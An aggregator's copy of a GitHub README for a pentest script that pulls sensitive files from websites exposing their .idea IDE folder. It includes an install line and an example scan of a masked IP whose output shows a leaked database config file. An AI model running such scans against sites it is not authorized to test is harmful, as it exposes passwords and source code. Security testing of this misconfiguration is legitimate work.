50

GitHub - lijiejie/idea_exploit: Gather sensitive information from (.idea) folder...

 4 years ago
source link: https://github.com/lijiejie/idea_exploit
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

README.md

.idea disclosure exploit

A script use .idea folder to gather sensitive information for pentesters .

Websites not correctly deployed let their IDE config folder (.idea) exposed to hacker,

which can lead password or archived data files leaked.

The scanner will try to download all files, please recheck local files by yourself.

Requirements

pip install lxml requests

Example

Our scanner reported a vulnerability this afternoon

scanner_pannel

As you can see, the file DbConnCfg.json leaked db password.

D:\IQIYI.codebase\idea_exp>idea_exp.py http://107.{mask}.{mask}.151/
[+] Module name is {mask}
[+] Type is web_module
[+] About 67 urls to process
[200] /cfg/DbConnCfg.json
[200] /bi/applepay/comm.php
[200] /bi/applepay/ipn_ios.php
[404] /auth/auth_ios/auth_guest.php
...
[200] /ver/ver_util.php
All files saved to 107.{mask}.{mask}.151/idea_exp_report.html

contain_password


About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK